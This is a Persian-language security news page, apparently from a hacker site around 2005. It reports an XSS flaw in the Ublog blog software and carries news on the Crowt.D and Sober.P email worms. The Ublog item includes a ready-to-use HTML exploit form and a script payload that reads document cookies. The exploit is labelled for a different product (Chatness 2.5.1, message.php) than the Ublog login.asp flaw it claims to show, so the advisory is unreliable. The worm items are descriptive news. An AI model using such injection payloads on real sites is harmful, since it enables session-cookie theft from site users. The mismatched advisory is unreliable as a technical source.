کشف دو آسیب پذیری در برنامه Ublog v1.0.4


حفره ی جدید در برنامه Ublog v1.0.4

تاریخ کشف:
7 فروردین 1384
Mar 29, 2005

درباره برنامه:
Ublog یک سیستم اخبار یا وب لاگ می باشد که تحت زبان ASP نوشته شده است.
برای کسب اطلاعات بیشتر به سایت: Ublog مراجعه کنید.

آسیب پذیری:
آسیب پذیری با نام Cross-Site Scripting Vulnerability یا همان XSS که باعث می شود مهاجم یک سری کد های مخرب را روی این سیستم ایجاد کنید. این آسیب پذیری در قسمت login.asp این سیستم موجد است.
نسخه های آسیب پذیر:

Uapplication Ublog 1.0
Uapplication Ublog 1.0.3
Uapplication Ublog 1.0.4



کد مخرب:

CODE

<html>

<head>
<title>Chatness 2.5.1 Html Injection Exploit</title>
</head>

<body>

<h1>Chatness 2.5.1 Html Injection Exploit</h1>


<form method="POST" action="http://www.example.com/message.php">
<b>XSS in message.php:</b><p>
Username:
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
<p>
<br>
example: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
<p>&nbsp;<input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>

</body>

</html>



اطلاعات بیشتر:
Security Focus bid
Security Focus Message


توسط : فرهاد کوشا
حق کپی رایت از سایت : www.persianhacker.net

انسداد سایت های ضد ویروس



گونه جدیدی از کرم Crowt به تازگی منتشر شده است که سبب آلودگی مرورگرهای وب می شود و از دسترسی آنها به سایت های آنتی ویروس جلوگیری می کند.

نسخه Crowt.D روز چهارشنبه کشف شد. در Advisory این کرم که شرکت Trend Micro آنرا منتشر کرده است گفته شده که این ویروس آدرس http://news.google.com را در مرورگر باز می کند و سپس به کاربر سیستم هشدار می دهد که لیستی از آدرسهای سایت ها را اضافه کند، زمانی که شخص بر روی یکی از آن آدرس ها کلیک کند به یک آدرس قبلی Redirect ( دوباره راهنمایی) می شود به این صورت وارد یک حلقه برگشتی از آدرس می شود که یک روش مؤثر برای جلوگیری از دسترسی به سایت ها می باشد.

سایت هایی را که این کرم از دسترسی به آنها جلوگیری می کند شامل : Trendmicro.com, Kapersky-labs.com, Sophos.com, Symantec.com و  Us.mcafee.com  می شود.

شرکت Trend Micro میزان خطر این کرم را پایین اعلام کرده اما این کرم بسیار قابل توجه مهندسین قرار گرفته زیرا این کرم می تواند به راحتی، قربانی را به سایت های مخرب و جعلی وارد کند و باعث حمله Pishing به کاربران شود.

این کرم مرورگری را که به عنوان قراردادی(Default) در ویندوز می باشد آلوده می سازد و ویندوز های 95,98,ME,2000,XP در مقابل این کرم آسیب پذیر هستند. ان کرم برای انتشار خود از کتابچه آدرس ایمیل ویندوز استفاده می کند و خود را تکثیر می نماید.

گونه جدیدی از کرم Sober کشف شد


 گونه جدیدی از کرم Sober کشف شد

متخصصان امنیتی روز گذشته نوع جدیدی از کرم Sober را کشف نموده اند که از طریق کامپیوترهای شخصی تکثیر می شود.

Sober.P که نوع جدید این کرم می باشد از روش هایd همانند گونه های پیش از خود برای تکثیر استفاده می کند، برای مثال: یک موضوعی را در ابتدای ایمیل قرار می دهد که قربانی فریب بخورد و فایل آلوده ضمیمه شده به ایمیل را باز کند، سپس آدرس های ذخیره شده در دفترچه آدرس را مورد حمله ایمیل های اسپم قرار می دهد.



Craig Schmugar مدیر بخش تحقیقات شرکت " McAfee " می گوید: " مهندسی اجتماعی در این مورد از حملات بسیار موثر می باشد. بطور مثال ویروس نویس ها پیغامی را به زبان آلمانی برای کاربران آلمانی ارسال می کنند و در متن ایمیل خبر داده اند که شما یک بلیط مسابقات جهانی فوتبال برنده شده اید. وی در ادامه می گوید ایمیل های آلوده با چنین متنی در این کشور قربانی های زیادی دارد زیرا نوع متن فریب کارانه در این ایمیل ها واقعا موثر می باشد."

Schmugar در مورد گونه جدید Sober می گوید: " این کرم جدید توسط پویش های نرم افزارهای ضد ویروس بسختی مشاهده می شود."



شرکت McAfee میزان خطر این کرم را برای کاربران سیستم های شخصی متوسط اعلام کرده است.


پاک کردن W32/Sober.p@MM